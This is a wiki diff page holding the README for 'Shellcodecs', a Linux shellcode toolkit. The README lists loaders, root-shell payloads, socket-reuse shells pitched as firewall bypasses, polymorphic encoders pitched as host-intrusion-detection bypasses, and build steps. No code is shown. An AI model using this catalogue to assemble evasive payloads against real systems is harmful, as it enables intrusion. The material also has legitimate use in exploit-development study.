Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcodecs"

From NetSec
Jump to: navigation, search
Line 18: Line 18:
 
* Standard unlinked same-socket-shell generator
 
* Standard unlinked same-socket-shell generator
 
* Dynamic socket-shell generator
 
* Dynamic socket-shell generator
 +
--------------------------------
 +
 +
#            Shellcodecs::README
 +
# http://www.blackhatlibrary.net/shellcode
 +
#
 +
#          www.blackhatlibrary.net
 +
#
 +
#        Sponsored by Viral Security
 +
#            www.viralsec.com
 +
 +
=Intro=
 +
  These shellcodes are provided with documentation located at
 +
          http://www.blackhatlibrary.net/Shellcode
 +
    !!!!!END USER IS LIABLE FOR THEIR OWN ACTIONS!!!!!
 +
 +
=Prerequisites=
 +
    * Linux
 +
    * GCC
 +
    * Generators require Python 2.7
 +
    * Automake
 +
 +
=Building the code=
 +
    * tar xzvf shellcode.tgz
 +
    * cd shellcode
 +
    * make
 +
    It is also possible to make exclusively x86 or x64
 +
    binaries using make x86 or make x64.  Please keep in
 +
    mind, there is more support for 64-bit in this
 +
    package than 32-bit.   
 +
 +
=Using the tools=
 +
    [loaders]
 +
    [generators] 
 +
 +
=Package contents=
 +
    Unless otherwise noted, code is amd64.  There are various
 +
    intel32 etc examples as well.  If you're unaware, amd64 is
 +
    the main linux tree for 64-bit, so if you have an intel,
 +
    you should still be ok.
 +
    If you think you may have an out of date version, or that
 +
    the official version is out-of-sync with the site, the
 +
    latest sources will be available 100% of the time at:
 +
        http://blackhatlibrary.net/Shellcode/Appendix
 +
    Directory: loaders
 +
        Description:  32-bit executable mmap-based shellcode loader
 +
        Filename:      loader-32.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
 +
        Length:        66 bytes
 +
        Description:  64-bit executable mmap-based shellcode loader
 +
        Filename:      loader-64.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
 +
        Length:        79 bytes
 +
        Description:  A dynamic loader for locally executable code
 +
        Filename:      dynamic-loader.c
 +
        Description:  A dynamic loader for remotely executable code
 +
        Filename:      socket-loader.c
 +
    Directory: environment
 +
        Description:  A 32-bit getpc (%eax) example
 +
        Filename:      getpc-32.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
 +
        Length:        11 bytes
 +
        Description:  A 64-bit getpc (%rax) example
 +
        Filename:      getpc-64.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
 +
        Length:        12 bytes
 +
        Description:  Alternative 64-bit getpc (%rax) example
 +
        Filename:      getpc-64-alt.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
 +
        Length:        10 bytes
 +
        Description:  Breakpoint detection code
 +
        Filename:      int3-detect-64.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#int3_breakpoints
 +
        Length:        24 bytes
 +
        Description:  32-bit lastcall example code
 +
        Filename:      lastcall-32.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#32-bit
 +
        Length:        4 bytes
 +
        Description:  64-bit lastcall example
 +
        Filename:      lastcall-64.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#64-bit
 +
        Length:        5 bytes
 +
        Description:  Alphanumeric lastcall
 +
        Filename:      lastcall-alphanum.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#Alphanumeric_2
 +
        Length:        13 bytes
 +
    Directory: null-free
 +
        Description:  A very short setuid(0); execve('/bin/sh',0,0);
 +
        Filename:      setuid_binsh.as
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
 +
        Length:        32 bytes
 +
        Description:  A small write-to-file payload
 +
        Filename:      write-file-32.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
 +
        Length:        90 bytes
 +
    Directory: socket-reuse
 +
        Description:  same-socket-shell payload
 +
        Filename:      socket-reuse.s
 +
        Documentation: http://blackhatlibrary.net/Shellcode/Socket-reuse
 +
        Length:        115 bytes
 +
        Description:  sends socket reuse shellcode
 +
        Filename:      socket-reuse.c
 +
    Directory: self-modifying
 +
        Description:  32-bit shellcode unpacker
 +
        Filename:      decoder-32.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
 +
        Length:        89 bytes
 +
        Description:  64-bit decoder (mmap)
 +
        Filename:      decoder.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
 +
        Length:        102 bytes
 +
        Description:  64-bit decoder
 +
        Filename:      decoder-no-mmap.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
 +
        Length:        69 bytes
 +
        Description:  32-bit shellcode packer
 +
        Filename:      packer-32.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#32_bit
 +
        Length:        37 bytes
 +
        Description:  64-bit shellcode packer
 +
        Filename:      packer-64.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#64_bit
 +
        Length:        55 bytes
 +
    Directory: alphanumeric
 +
        Filename:      ascii_binsh.s   
 +
        Description:  alphanumeric execve('/bin/sh',0,0)
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Alphanumeric
 +
        Length:        111 bytes
 +
        Filename:      architecture_detection
 +
        Description:  alphanumeric x86* compatible architecture detection stub
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Environment
 +
        Length:        15 bytes
 +
    Directory: dynamic
 +
        Description:  Self-linking exit code
 +
        Filename:      linked-exit.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic
 +
        Length:        135 bytes
 +
        Description:  Self-linking socket reuse shellcode
 +
        Filename:      linker-fd-reuse.s
 +
        Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic#The_dynamic_shell
 +
        Length:        268 bytes
 +
        Description:  Self-linking polymorphic socket reuse shellcode
 +
        Filename:      poly-linker-fd-reuse.s
 +
        Documentation: None
 +
        Length:        268 bytes
 +
    Directory: generators
 +
        Description:  Hash generator for self-linking shellcode
 +
        Filename:      hash-generator.s
 +
        Documentation: None
 +
        Length:        81 bytes
 +
        Description:  Socket-reuse shellcode generator
 +
        Filename:      socket-reuse-generator.py
 +
        Documentation: None
 +
       
 +
        Description:  Polymorphic socket reuse generator
 +
        Filename:      poly-socket-reuse-generator.py
 +
        Documentation: None
 +
       
 +
        Description:  Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable)
 +
        Filename:      shellcode-generator.py
 +
        Documentation: None
 +
 +
=Getting help=
 +
        Note: We are not your free tech support.
 +
            03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)~~
 +
          Reminder: Docs are available at
 +
      http://www.blackhatlibrary.net/shellcode
 +
  If you're using the tools and there's a problem, try
 +
re-reading the documentation before asking a question.  If
 +
you're absolutely sure it is programmatical error and not
 +
user error preventing the code from working properly, you
 +
can let us know by joining our IRC or talking on the
 +
shellcode talk page.
 +
  If you'd like to pay for professional training on the
 +
materials contained in this courseware, please contact our
 +
sponsor at www.viralsec.com
 +
=Credits=
 +
  Lead developer:        Hatter
 +
  Supporting developers: jtRIPper, eax
 +
  Community:  www.blackhatlibrary.net
 +
  Commercial:    www.viralsec.com

Revision as of 00:54, 2 December 2012

Shellcodecs is a collection of shellcodes, loaders, sources, and generators designed to ease the exploitation and shellcode programming process.


Loaders:

  • Unlinked 32-bit
  • Unlinked 64-bit
  • Dynamic C loader
  • Dynamic socket loader

Payloads:

  • setuid(0); execve('/bin/sh',0,0)
  • Alphanumeric execve('/bin/sh',0,0) 104 bytes
  • Same-socket-shell (Firewall bypass)
  • Dynamic linker (HIDS/HIPS bypass, syscall restriction bypass)

Generators:

  • Shellcode extractor
  • Standard unlinked same-socket-shell generator
  • Dynamic socket-shell generator
  1. Shellcodecs::README
  2. http://www.blackhatlibrary.net/shellcode
  4. www.blackhatlibrary.net
  6. Sponsored by Viral Security
  7. www.viralsec.com

Intro

 These shellcodes are provided with documentation located at
         http://www.blackhatlibrary.net/Shellcode
    !!!!!END USER IS LIABLE FOR THEIR OWN ACTIONS!!!!!

Prerequisites

   * Linux
   * GCC
   * Generators require Python 2.7
   * Automake

Building the code

   * tar xzvf shellcode.tgz
   * cd shellcode
   * make 
   It is also possible to make exclusively x86 or x64 
   binaries using make x86 or make x64.  Please keep in
   mind, there is more support for 64-bit in this 
   package than 32-bit.

Using the tools

   [loaders]
   [generators]

Package contents

    Unless otherwise noted, code is amd64.  There are various
    intel32 etc examples as well.  If you're unaware, amd64 is
    the main linux tree for 64-bit, so if you have an intel,
    you should still be ok.
    If you think you may have an out of date version, or that 
    the official version is out-of-sync with the site, the 
    latest sources will be available 100% of the time at:
        http://blackhatlibrary.net/Shellcode/Appendix
   Directory: loaders
       Description:   32-bit executable mmap-based shellcode loader
       Filename:      loader-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
       Length:        66 bytes
       Description:   64-bit executable mmap-based shellcode loader
       Filename:      loader-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Loaders
       Length:        79 bytes
       Description:   A dynamic loader for locally executable code
       Filename:      dynamic-loader.c
       Description:   A dynamic loader for remotely executable code
       Filename:      socket-loader.c
   Directory: environment
       Description:   A 32-bit getpc (%eax) example
       Filename:      getpc-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
       Length:        11 bytes
       Description:   A 64-bit getpc (%rax) example
       Filename:      getpc-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
       Length:        12 bytes
       Description:   Alternative 64-bit getpc (%rax) example
       Filename:      getpc-64-alt.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#GetPc
       Length:        10 bytes
       Description:   Breakpoint detection code
       Filename:      int3-detect-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#int3_breakpoints
       Length:        24 bytes
       Description:   32-bit lastcall example code
       Filename:      lastcall-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#32-bit
       Length:        4 bytes
       Description:   64-bit lastcall example
       Filename:      lastcall-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#64-bit
       Length:        5 bytes
       Description:   Alphanumeric lastcall
       Filename:      lastcall-alphanum.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment#Alphanumeric_2
       Length:        13 bytes
   Directory: null-free
       Description:   A very short setuid(0); execve('/bin/sh',0,0);
       Filename:      setuid_binsh.as
       Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
       Length:        32 bytes
       Description:   A small write-to-file payload
       Filename:      write-file-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Null-free
       Length:        90 bytes
   Directory: socket-reuse
       Description:   same-socket-shell payload
       Filename:      socket-reuse.s
       Documentation: http://blackhatlibrary.net/Shellcode/Socket-reuse
       Length:        115 bytes
       Description:   sends socket reuse shellcode 
       Filename:      socket-reuse.c
   Directory: self-modifying
       Description:   32-bit shellcode unpacker
       Filename:      decoder-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
       Length:        89 bytes
       Description:   64-bit decoder (mmap)
       Filename:      decoder.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
       Length:        102 bytes
       Description:   64-bit decoder
       Filename:      decoder-no-mmap.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#The_unpacker
       Length:        69 bytes
       Description:   32-bit shellcode packer
       Filename:      packer-32.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#32_bit
       Length:        37 bytes
       Description:   64-bit shellcode packer
       Filename:      packer-64.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Self-modifying#64_bit
       Length:        55 bytes
   Directory: alphanumeric
       Filename:      ascii_binsh.s     
       Description:   alphanumeric execve('/bin/sh',0,0)
       Documentation: http://www.blackhatlibrary.net/Shellcode/Alphanumeric
       Length:        111 bytes
       Filename:      architecture_detection
       Description:   alphanumeric x86* compatible architecture detection stub
       Documentation: http://www.blackhatlibrary.net/Shellcode/Environment
       Length:        15 bytes
   Directory: dynamic
       Description:   Self-linking exit code
       Filename:      linked-exit.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic
       Length:        135 bytes
       Description:   Self-linking socket reuse shellcode
       Filename:      linker-fd-reuse.s
       Documentation: http://www.blackhatlibrary.net/Shellcode/Dynamic#The_dynamic_shell
       Length:        268 bytes
       Description:   Self-linking polymorphic socket reuse shellcode
       Filename:      poly-linker-fd-reuse.s
       Documentation: None
       Length:        268 bytes
   Directory: generators
       Description:   Hash generator for self-linking shellcode 
       Filename:      hash-generator.s
       Documentation: None
       Length:        81 bytes
       Description:   Socket-reuse shellcode generator 
       Filename:      socket-reuse-generator.py
       Documentation: None
       
       Description:   Polymorphic socket reuse generator
       Filename:      poly-socket-reuse-generator.py
       Documentation: None
       
       Description:   Nicely assemble and output shellcode in a variety of formats (raw, hex, and as a C variable) 
       Filename:      shellcode-generator.py
       Documentation: None

Getting help

       Note: We are not your free tech support.
            03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)03:54, 2 December 2012 (MSK)~~
          Reminder: Docs are available at 
      http://www.blackhatlibrary.net/shellcode 
  If you're using the tools and there's a problem, try

re-reading the documentation before asking a question. If you're absolutely sure it is programmatical error and not user error preventing the code from working properly, you can let us know by joining our IRC or talking on the shellcode talk page. 

  If you'd like to pay for professional training on the

materials contained in this courseware, please contact our sponsor at www.viralsec.com

Credits

 Lead developer:        Hatter
 Supporting developers: jtRIPper, eax
 Community:   www.blackhatlibrary.net
 Commercial:     www.viralsec.com
Retrieved from "http://nets.ec/index.php?title=Shellcodecs&oldid=10588"